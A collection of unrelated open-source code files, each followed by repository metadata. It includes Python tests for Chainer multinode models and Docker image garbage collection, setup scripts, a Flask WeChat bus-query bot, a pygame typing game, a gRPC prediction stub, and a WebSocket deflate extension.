if communicator.size < 2:
pytest.skip('This test is for multinode only')
rank_next = (communicator.rank + 1) % communicator.size
rank_prev = (communicator.rank - 1) % communicator.size
return communicator, rank_next, rank_prev
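# For example (illustrative): with 4 MPI processes, rank 1 gets
# rank_next == 2 and rank_prev == 0, so the Cycle*/Cross* models below form
# the ring 0 -> 1 -> 2 -> 3 -> 0.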
def check_cycle_model(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
model = L.Classifier(
Cycle0(d, communicator, rank_next, rank_prev))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
else:
model = Cycle1(
d, communicator, rank_next, rank_prev)
if gpu:
model.to_device(cupy.cuda.Device())
for i in range(n):
err = model()
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_cycle_model_cpu(param):
check_cycle_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_cycle_model_gpu(param):
check_cycle_model(True, param)
def check_crossing_model(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
model = L.Classifier(Cross0(
d, communicator, rank_next, rank_prev))
else:
model = L.Classifier(Cross1(
d, communicator, rank_next, rank_prev))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_crossing_model_cpu(param):
check_crossing_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_crossing_model_gpu(param):
check_crossing_model(True, param)
def check_branching_model(gpu, communicator, rank_next, rank_prev,
parent_model, param):
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
rank_children = [rank for rank in range(1, communicator.size)]
model = L.Classifier(parent_model(
d, communicator, rank_children))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
else:
model = BranchChild(d, communicator, 0)
if gpu:
model.to_device(cupy.cuda.Device())
for i in range(n):
err = model()
err.backward()
def check_branching_models(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent1, param)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent2, param)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent3, param)
check_branching_model(gpu, communicator, rank_next, rank_prev,
BranchParent4, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_branching_models_cpu(param):
check_branching_models(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_branching_models_gpu(param):
check_branching_models(True, param)
def check_twisting_model(gpu, param):
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank == 0:
model = L.Classifier(
TwistFirst(d, communicator, rank_next))
elif communicator.rank == communicator.size - 1:
model = L.Classifier(
TwistLast(d, communicator, rank_prev))
else:
model = L.Classifier(Twist(
d, communicator, rank_prev, rank_next))
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
err = model(X[i:i + 1], Y[i:i + 1])
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_twisting_model_cpu(param):
check_twisting_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_twisting_model_gpu(param):
check_twisting_model(True, param)
def check_tuple_data_model(gpu, param):
# This test only uses pairs (0, 1), (2, 3), ... (2m, 2m+1)
communicator, rank_next, rank_prev = create_communicator(gpu)
n, d = 100, 10
X = np.random.randn(n, d).astype(param.dtype)
Y = (np.random.rand(n) * 2).astype(np.int32)
with chainer.using_config('dtype', param.dtype):
if communicator.rank % 2 == 0:
if communicator.rank == communicator.size - 1:
                # in case rank 2m is the rightmost rank when the number of nodes is odd
return
model = L.Classifier(
TupleDataParent(communicator, d, rank_next))
elif communicator.rank % 2 == 1:
model = TupleDataChild(communicator, d, rank_prev)
assert model is not None
if gpu:
model.to_device(cupy.cuda.Device())
X = chainer.backends.cuda.to_gpu(X)
Y = chainer.backends.cuda.to_gpu(Y)
for i in range(n):
if communicator.rank % 2 == 0:
err = model(X[i:i + 1], Y[i:i + 1])
elif communicator.rank % 2 == 1:
err = model()
assert err is not None
err.backward()
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_tuple_data_model_cpu(param):
check_tuple_data_model(False, param)
@pytest.mark.parametrize('param', params)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
@chainer.testing.attr.gpu
def test_tuple_data_model_gpu(param):
check_tuple_data_model(True, param)
|
{
"content_hash": "42be6c958e0a2312fc67d11985ba3853",
"timestamp": "",
"source": "github",
"line_count": 461,
"max_line_length": 79,
"avg_line_length": 32.62689804772234,
"alnum_prop": 0.6103982447975533,
"repo_name": "wkentaro/chainer",
"id": "6d8d91758a8f2447408cdf3cfcc2625783a187bf",
"size": "15041",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/chainermn_tests/links_tests/test_multi_node_chain_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3368"
},
{
"name": "C",
"bytes": "1231"
},
{
"name": "C++",
"bytes": "1662966"
},
{
"name": "CMake",
"bytes": "50912"
},
{
"name": "Cuda",
"bytes": "178765"
},
{
"name": "Dockerfile",
"bytes": "3316"
},
{
"name": "PowerShell",
"bytes": "7197"
},
{
"name": "Python",
"bytes": "6041757"
},
{
"name": "Shell",
"bytes": "41813"
}
],
"symlink_target": ""
}
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import print_function, unicode_literals
import flexmock
import pytest
from atomic_reactor.core import DockerTasker
from atomic_reactor.inner import DockerBuildWorkflow
from atomic_reactor.plugin import PostBuildPluginsRunner
from atomic_reactor.plugins.exit_remove_built_image import (GarbageCollectionPlugin,
defer_removal)
from atomic_reactor.plugins.post_tag_and_push import TagAndPushPlugin
from atomic_reactor.util import ImageName
from tests.constants import (LOCALHOST_REGISTRY,
TEST_IMAGE,
IMPORTED_IMAGE_ID,
INPUT_IMAGE,
MOCK)
if MOCK:
from tests.docker_mock import mock_docker
class X(object):
pass
def mock_environment(base_image=None):
if MOCK:
mock_docker()
tasker = DockerTasker()
workflow = DockerBuildWorkflow({"provider": "git", "uri": "asd"},
TEST_IMAGE)
workflow.postbuild_results[TagAndPushPlugin.key] = True
workflow.tag_conf.add_primary_image(TEST_IMAGE)
workflow.push_conf.add_docker_registry(LOCALHOST_REGISTRY, insecure=True)
setattr(workflow, 'builder', X())
setattr(workflow.builder, 'image_id', INPUT_IMAGE)
setattr(workflow.builder, 'source', X())
setattr(workflow.builder.source, 'dockerfile_path', None)
setattr(workflow.builder.source, 'path', None)
base_image = ImageName.parse(IMPORTED_IMAGE_ID)
setattr(workflow.builder, 'base_image', base_image)
workflow.pulled_base_images.add(IMPORTED_IMAGE_ID)
return tasker, workflow
class TestGarbageCollectionPlugin(object):
@pytest.mark.parametrize(('remove_base', 'deferred', 'expected'), [
(False, [], set([INPUT_IMAGE])),
(False, ['defer'], set([INPUT_IMAGE, 'defer'])),
(True, [], set([IMPORTED_IMAGE_ID, INPUT_IMAGE])),
(True, ['defer'], set([IMPORTED_IMAGE_ID, INPUT_IMAGE, 'defer'])),
])
def test_remove_built_image_plugin(self, remove_base, deferred, expected):
tasker, workflow = mock_environment()
runner = PostBuildPluginsRunner(
tasker,
workflow,
[{
'name': GarbageCollectionPlugin.key,
'args': {'remove_pulled_base_image': remove_base},
}]
)
removed_images = []
def spy_remove_image(image_id, force=None):
removed_images.append(image_id)
flexmock(tasker, remove_image=spy_remove_image)
for image in deferred:
defer_removal(workflow, image)
runner.run()
image_set = set(removed_images)
assert len(image_set) == len(removed_images)
assert image_set == expected
|
{
"content_hash": "8d2cd58810a8552fdca13dcd6059e8fa",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 84,
"avg_line_length": 35.04705882352941,
"alnum_prop": 0.6307485733467607,
"repo_name": "jarodwilson/atomic-reactor",
"id": "d7e8da413e2f82b2e631ceee893b1a40e6447bd9",
"size": "2979",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/plugins/test_remove_built_image.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1134730"
},
{
"name": "Shell",
"bytes": "3589"
}
],
"symlink_target": ""
}
|
from JumpScale import j
import time
descr = """
This jumpscript waits for `waittime` seconds (test)
"""
category = "test"
organization = "jumpscale"
author = "kristof@incubaid.com"
license = "bsd"
version = "1.0"
roles = []
def action(msg, waittime):
j.logger.log(msg, level=5, category="test.wait")
time.sleep(waittime)
return msg
|
{
"content_hash": "4b0765f755569665578c43744801f71a",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 52,
"avg_line_length": 17.736842105263158,
"alnum_prop": 0.6824925816023739,
"repo_name": "Jumpscale/jumpscale_core8",
"id": "b68b4f995d8796ef0bb1181e453f49faf4674cf8",
"size": "337",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/agentcontroller/jumpscripts/jumpscale/test_wait.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1113"
},
{
"name": "Cap'n Proto",
"bytes": "9033"
},
{
"name": "Lua",
"bytes": "12538"
},
{
"name": "Python",
"bytes": "4343122"
},
{
"name": "Shell",
"bytes": "7091"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
pytest.main(self.test_args)
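# With the cmdclass mapping below, the test suite can be run via
# `python setup.py test` (assumed invocation; pytest is pulled in through
# tests_require rather than being a hard install dependency).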
setup(name='variational-dropout',
version='0.0.1',
description='Initial Variational Dropout replication.',
author='Gavin Gray',
author_email='g.d.b.gray@sms.ed.ac.uk',
packages=['varout'],
tests_require=['pytest'],
# install reqs pending
cmdclass={'test': PyTest},
)
|
{
"content_hash": "77797ef028469fedc77e1a6fe55afea1",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 61,
"avg_line_length": 29.545454545454547,
"alnum_prop": 0.6492307692307693,
"repo_name": "gngdb/variational-dropout",
"id": "e2b6028911d1d91defb35849e15dc744d87d865a",
"size": "673",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1628824"
},
{
"name": "Python",
"bytes": "39188"
},
{
"name": "Shell",
"bytes": "43"
},
{
"name": "TeX",
"bytes": "10519"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('cat_id', models.IntegerField(serialize=False, primary_key=True)),
('short_name', models.CharField(max_length=200)),
],
options={
},
bases=(models.Model,),
),
]
|
{
"content_hash": "bb39b95085edc1ad5910232855631c44",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 83,
"avg_line_length": 23.045454545454547,
"alnum_prop": 0.5305719921104537,
"repo_name": "speedaddict81/Eventsite",
"id": "5116b2e05d9e93bfcc27c3a45bdddbbe1777094b",
"size": "531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "events/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "707"
},
{
"name": "HTML",
"bytes": "3154"
},
{
"name": "JavaScript",
"bytes": "771"
},
{
"name": "Python",
"bytes": "11058"
}
],
"symlink_target": ""
}
|
from alembic.operations import Operations
from alembic import util
# create proxy functions for
# each method on the Operations class.
util.create_module_class_proxy(Operations, globals(), locals())
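# After the proxying above, migration scripts can call Operations methods as
# module-level functions. A typical (illustrative) migration step:
#
#     import sqlalchemy as sa
#     from alembic import op
#
#     def upgrade():
#         op.add_column('accounts', sa.Column('email', sa.String(50)))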
|
{
"content_hash": "d4641880ddaa392883ffe28ec0c2145b",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 63,
"avg_line_length": 33.333333333333336,
"alnum_prop": 0.8,
"repo_name": "shadowmint/py-test-watcher",
"id": "6934ccc8aa2050213169d69676830ab4f2d5cb51",
"size": "200",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/alembic-0.5.0/alembic/op.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "109878"
},
{
"name": "Python",
"bytes": "488664"
},
{
"name": "Shell",
"bytes": "544"
}
],
"symlink_target": ""
}
|
from flask import Flask, render_template
from flask_weixin import Weixin
from beijing_bus import BeijingBus
# Example query shown to users ("Query example: from Xibahe to Jiangtai Intersection West")
QUERY_EXAMPLE = '查询示例: 从西坝河到将台路口西'
# Push a usage-instructions message to users when they follow the official account
ON_FOLLOW_MESSAGE = {
'title': '使用说明',
'description': '',
'picurl': 'http://doora.qiniudn.com/H9v9n.jpg',
'url': 'http://t.cn/Rz0J1V6',
}
app = Flask(__name__)
app.config.from_object('config')
weixin = Weixin(app)
app.add_url_rule('/weixin', view_func=weixin.view_func)
if app.config.get('SENTRY_DSN'):
from raven.contrib.flask import Sentry
sentry = Sentry(app)
@weixin.register('*')
def query(**kwargs):
username = kwargs.get('sender')
sender = kwargs.get('receiver')
message_type = kwargs.get('type')
def r(content):
return weixin.reply(
username, sender=sender, content=content
)
if message_type == 'event' and kwargs.get('event') == 'subscribe':
return weixin.reply(
username, type='news', sender=sender, articles=[ON_FOLLOW_MESSAGE]
)
content = kwargs.get('content')
if not content:
reply = '我好笨笨哦,还不懂你在说什么。\n%s' % QUERY_EXAMPLE
return r(reply)
if isinstance(content, unicode):
content = content.encode('utf-8')
stations = BeijingBus.extract_stations(content)
lines = BeijingBus.extract_lines(content)
if len(stations) < 2:
reply = '没有结果,可能还不支持这条线路呢~ \n%s' % QUERY_EXAMPLE
return r(reply)
from_station, to_station = stations[:2]
lines = match_stations_with_lines(from_station, to_station, lines)
if not lines:
reply = '没有结果,可能还不支持这条线路呢~ \n%s' % QUERY_EXAMPLE
return r(reply)
reply = get_realtime_message(lines, from_station)
return r(reply)
def match_stations_with_lines(from_station, to_station, lines=None):
def match(a, b, l):
        '''Check that l contains both a and b, with a before b'''
try:
return l.index(a) < l.index(b)
except ValueError:
return False
if not lines:
lines = BeijingBus.get_all_lines()
return [
line for line in lines if match(from_station, to_station, line.stations)
]
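# For example (illustrative): if line.stations is [A, B, C], a query from A
# to C matches (index 0 < index 2) while C to A does not; lines missing
# either station are filtered out because match() turns the ValueError from
# list.index into False.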
def get_realtime_message(lines, station):
realtime_datas = []
for line in lines:
for data in line.get_realtime_data(station):
if data.get('station_arriving_time'):
realtime_datas.append((line, data))
realtime_datas.sort(key=lambda d: d[1]['station_arriving_time'])
if not realtime_datas:
return '暂时还没有车要来呢 T T'
reply = ''
for i, (line, data) in enumerate(realtime_datas[:6]):
reply += '车辆%s:%s\n' % (i+1, line.short_name)
reply += '距离%s还有 %s米,' % (station.name, int(data['station_distance']))
reply += '预计%s到达\n\n' % data['station_arriving_time'].strftime('%H:%M')
return reply.strip()
@app.route('/list')
def list_supported_lines():
names = set([
line.short_name for line in BeijingBus.get_all_lines()
])
names = sorted([n.decode('utf-8') for n in names])
return render_template('list.html', line_names=names)
if __name__ == '__main__':
app.run(debug=True, port=8484)
|
{
"content_hash": "1457f9f5feededf2e4be1e3af2198c18",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 80,
"avg_line_length": 26.99137931034483,
"alnum_prop": 0.6183328010220377,
"repo_name": "wong2/beijing_bus",
"id": "ea91e54a42679b91041643bdc00fdc7c827bf912",
"size": "3389",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "weixin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "501"
},
{
"name": "Python",
"bytes": "14428"
}
],
"symlink_target": ""
}
|
import sys, pygame, time,random
from pygame.locals import *
def print_text(font, x, y, text, color=(255, 255, 255)):
imgText = font.render(text, True, color)
screen.blit(imgText, (x, y))
# main program begins
pygame.init()
screen = pygame.display.set_mode((600, 500))
font1 = pygame.font.Font(None, 24)
font2 = pygame.font.Font(None, 200)
white = 255, 255, 255
yellow = 255, 255, 0
key_flag = False
correct_answer = 97
seconds = 11
score = 0
clock_start = 0
game_over = True
while True:
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
elif event.type == KEYDOWN:
key_flag = True
elif event.type == KEYUP:
key_flag = False
keys = pygame.key.get_pressed()
if keys[K_ESCAPE]:
sys.exit()
if keys[K_RETURN]:
if game_over:
game_over = False
score = 0
seconds = 11
clock_start = time.clock()
current = time.clock() - clock_start
speed = score * 6
if seconds-current < 0:
game_over = True
elif current <= 10:
if keys[correct_answer]:
correct_answer = random.randint(97, 122)
score += 1
screen.fill((0,100,0))
print_text(font1, 0, 0,'let\'s see how fast you can type!' )
    print_text(font1, 0, 20, 'try to keep up for 10 seconds...')
if key_flag:
print_text(font1, 500, 0, '<key>')
if not game_over:
print_text(font1, 0, 80, 'time:'+str(int(seconds-current)))
print_text(font1, 0, 100, 'speed: '+str(speed)+' letters/min')
if game_over:
print_text(font1,0, 160, 'press enter to start')
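    # correct_answer holds a lowercase key code (97-122, ord('a')..ord('z'));
    # subtracting 32 gives the matching uppercase letter to display.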
print_text(font2, 0, 240, chr(correct_answer-32), yellow)
pygame.display.update()
|
{
"content_hash": "8c3bd049b8a8c116c4e653d74c82ffd6",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 67,
"avg_line_length": 27.104477611940297,
"alnum_prop": 0.5638766519823789,
"repo_name": "sun1218/Pygames",
"id": "274fa11c218f3b511b9bc9e8d812991f7c6e6e79",
"size": "1816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "game/type_speed.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "126530"
}
],
"symlink_target": ""
}
|
import grpc
from google.cloud.automl_v1beta1.proto import prediction_service_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2
class PredictionServiceStub(object):
"""AutoML Prediction API.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Predict = channel.unary_unary(
'/google.cloud.automl.v1beta1.PredictionService/Predict',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictResponse.FromString,
)
class PredictionServiceServicer(object):
"""AutoML Prediction API.
"""
def Predict(self, request, context):
"""Perform a prediction.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PredictionServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Predict': grpc.unary_unary_rpc_method_handler(
servicer.Predict,
request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictRequest.FromString,
response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_prediction__service__pb2.PredictResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.cloud.automl.v1beta1.PredictionService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
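# Minimal wiring sketch (illustrative; MyPredictionServicer stands in for a
# concrete PredictionServiceServicer subclass):
#
#     from concurrent import futures
#     server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
#     add_PredictionServiceServicer_to_server(MyPredictionServicer(), server)
#     server.add_insecure_port('[::]:50051')
#     server.start()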
|
{
"content_hash": "a944c455e87ba49486f33d72f6e89685",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 147,
"avg_line_length": 37.46666666666667,
"alnum_prop": 0.7301304863582444,
"repo_name": "jonparrott/gcloud-python",
"id": "adfd74458e4e378bc76cfe13acce43d8970ce2cd",
"size": "1756",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "automl/google/cloud/automl_v1beta1/proto/prediction_service_pb2_grpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62009"
},
{
"name": "Python",
"bytes": "3459300"
},
{
"name": "Shell",
"bytes": "7548"
}
],
"symlink_target": ""
}
|
import frappe
from frappe.utils import escape_html, get_request_site_address, now, cstr
from urllib.parse import quote, urljoin
no_cache = 1
base_template_path = "www/rss.xml"
def get_context(context):
"""generate rss feed"""
host = get_request_site_address()
blog_list = frappe.db.sql("""\
select route as name, published_on, modified, title, content from `tabBlog Post`
where ifnull(published,0)=1
order by published_on desc limit 20""", as_dict=1)
for blog in blog_list:
blog_page = cstr(quote(blog.name.encode("utf-8")))
blog.link = urljoin(host, blog_page)
blog.content = escape_html(blog.content or "")
if blog_list:
modified = max((blog['modified'] for blog in blog_list))
else:
modified = now()
blog_settings = frappe.get_doc('Blog Settings', 'Blog Settings')
context = {
'title': blog_settings.blog_title or "Blog",
'description': blog_settings.blog_introduction or "",
'modified': modified,
'items': blog_list,
'link': host + '/blog'
}
return context
|
{
"content_hash": "7024d514b1a702a4d75138100836047c",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 82,
"avg_line_length": 26.23076923076923,
"alnum_prop": 0.6930596285434996,
"repo_name": "almeidapaulopt/frappe",
"id": "093cdf2d19b53a7680b9b2c77b13ed9b2dbf44cb",
"size": "1121",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/www/rss.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "67734"
},
{
"name": "HTML",
"bytes": "245760"
},
{
"name": "JavaScript",
"bytes": "2345089"
},
{
"name": "Less",
"bytes": "25489"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3436599"
},
{
"name": "SCSS",
"bytes": "248606"
},
{
"name": "Shell",
"bytes": "3505"
},
{
"name": "Vue",
"bytes": "96912"
}
],
"symlink_target": ""
}
|
import zlib
from extension import Extension
from deflate_frame import DeflateFrame
class DeflateMessage(Extension):
"""
Implementation of the "permessage-deflate" extension, as defined by
http://tools.ietf.org/html/draft-ietf-hybi-permessage-compression-17.
    Note: this implementation is only suitable for server sockets; client
    sockets must NOT use it.
"""
name = 'permessage-deflate'
rsv1 = True
defaults = {
'client_max_window_bits': zlib.MAX_WBITS,
'client_no_context_takeover': False,
'server_max_window_bits': zlib.MAX_WBITS,
'server_no_context_takeover': False
}
before_fragmentation = True
compression_threshold = 20 # minimal message payload size for compression
def negotiate(self, name, params):
default = self.defaults['client_max_window_bits']
if 'client_max_window_bits' in params:
mwb = params['client_max_window_bits']
if mwb is True:
if default != zlib.MAX_WBITS:
yield 'client_max_window_bits', default
else:
mwb = int(mwb)
assert 8 <= mwb <= zlib.MAX_WBITS
yield 'client_max_window_bits', min(mwb, default)
elif default != zlib.MAX_WBITS:
yield 'client_max_window_bits', default
if 'client_no_context_takeover' in params:
assert params['client_no_context_takeover'] is True
yield 'client_no_context_takeover', True
elif self.defaults['client_no_context_takeover']:
yield 'client_no_context_takeover', True
default = self.defaults['server_max_window_bits']
if 'server_max_window_bits' in params:
mwb = int(params['server_max_window_bits'])
assert 8 <= mwb <= zlib.MAX_WBITS
yield 'server_max_window_bits', min(mwb, default)
elif default != zlib.MAX_WBITS:
yield 'server_max_window_bits', default
if 'server_no_context_takeover' in params:
assert params['server_no_context_takeover'] is True
yield 'server_no_context_takeover', True
elif self.defaults['server_no_context_takeover']:
yield 'server_no_context_takeover', True
class Instance(DeflateFrame.Instance):
def init(self):
if not self.server_no_context_takeover:
self.defl = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -self.server_max_window_bits)
if not self.client_no_context_takeover:
self.dec = zlib.decompressobj(-self.client_max_window_bits)
def deflate(self, data):
if self.server_no_context_takeover:
self.defl = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -self.server_max_window_bits)
compressed = self.defl.compress(data)
compressed += self.defl.flush(zlib.Z_SYNC_FLUSH)
assert compressed[-4:] == '\x00\x00\xff\xff'
return compressed[:-4]
def inflate(self, data):
data = str(data + '\x00\x00\xff\xff')
if self.client_no_context_takeover:
self.dec = zlib.decompressobj(-self.client_max_window_bits)
return self.dec.decompress(data)
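# Standalone sanity check of the framing assumed above (illustrative): a raw
# deflate stream flushed with Z_SYNC_FLUSH always ends with the empty stored
# block 00 00 ff ff, which deflate() strips and inflate() re-appends.
#
#     defl = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15)
#     chunk = defl.compress('payload') + defl.flush(zlib.Z_SYNC_FLUSH)
#     assert chunk[-4:] == '\x00\x00\xff\xff'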
|
{
"content_hash": "01e2a8d398c61097ca556ab4dbf3bf50",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 78,
"avg_line_length": 37.561797752808985,
"alnum_prop": 0.6054442117858211,
"repo_name": "taddeus/wspy",
"id": "5cf0573987da1663c4d795fa40ea9834a2f01990",
"size": "3343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deflate_message.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "997"
},
{
"name": "Python",
"bytes": "89995"
}
],
"symlink_target": ""
}
|
"""setup.py for Brax.
Install for development:
pip install -e .
"""
from setuptools import find_packages
from setuptools import setup
setup(
name="brax",
version="0.0.15",
description=("A differentiable physics engine written in JAX."),
author="Brax Authors",
author_email="no-reply@google.com",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="http://github.com/google/brax",
license="Apache 2.0",
packages=find_packages(),
include_package_data=True,
scripts=["bin/learn"],
install_requires=[
"absl-py",
"dataclasses",
"dm_env",
"flax",
"gym",
"grpcio",
"jax",
"jaxlib",
"numpy",
"optax",
"Pillow",
"pytinyrenderer",
"tensorboardX",
"trimesh",
"typing-extensions",
# TODO: remove when
# https://github.com/google/flax/issues/2190 is fixed.
"PyYAML>=6.0",
],
extras_require={
"develop": ["pytest", "transforms3d"],
},
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
keywords="JAX reinforcement learning rigidbody physics",
data_files=[
("testdata", ["brax/tests/testdata/cylinder.stl"])
],
)
|
{
"content_hash": "7ac5195db1ceac1e58e11860996de26a",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 69,
"avg_line_length": 26.54237288135593,
"alnum_prop": 0.5798212005108557,
"repo_name": "google/brax",
"id": "9ea6e535f8696c7d09edeac49b65cc21d8aca6d2",
"size": "2148",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "27572"
},
{
"name": "Jupyter Notebook",
"bytes": "8554172"
},
{
"name": "Python",
"bytes": "1189091"
}
],
"symlink_target": ""
}
|
import sqlite3, os
from itunes import get_library_file, ITunes
from hplatform import get_db_path, get_default_path
def get_music_files(dir):
music_files = []
for root, dirs, files in os.walk(dir):
for file in files:
if is_music_file(file):
                # Trying to catch the special case in Ubuntu where $HOME/Network
                # maps to every network share. You can still upload that dir if
                # you select it explicitly, but it won't descend automatically.
if not(root == os.getenv('HOME') and file == 'Network'
and os.name == 'posix'):
music_files.append(os.path.join(root, file))
return music_files
def is_music_file(file):
return file.endswith('.mp3') or file.endswith('.m4a')
def unique_dirs(dirs):
unique_dirs = []
dirs.sort()
for dir in dirs:
child_dir = False
for pdir in unique_dirs:
if os.path.commonprefix([pdir, dir]) == pdir:
child_dir = True
break
if not child_dir:
unique_dirs.append(dir)
return unique_dirs
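# For example (illustrative): unique_dirs(['/music/rock', '/music', '/other'])
# returns ['/music', '/other'], since walking '/music' already covers
# '/music/rock'.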
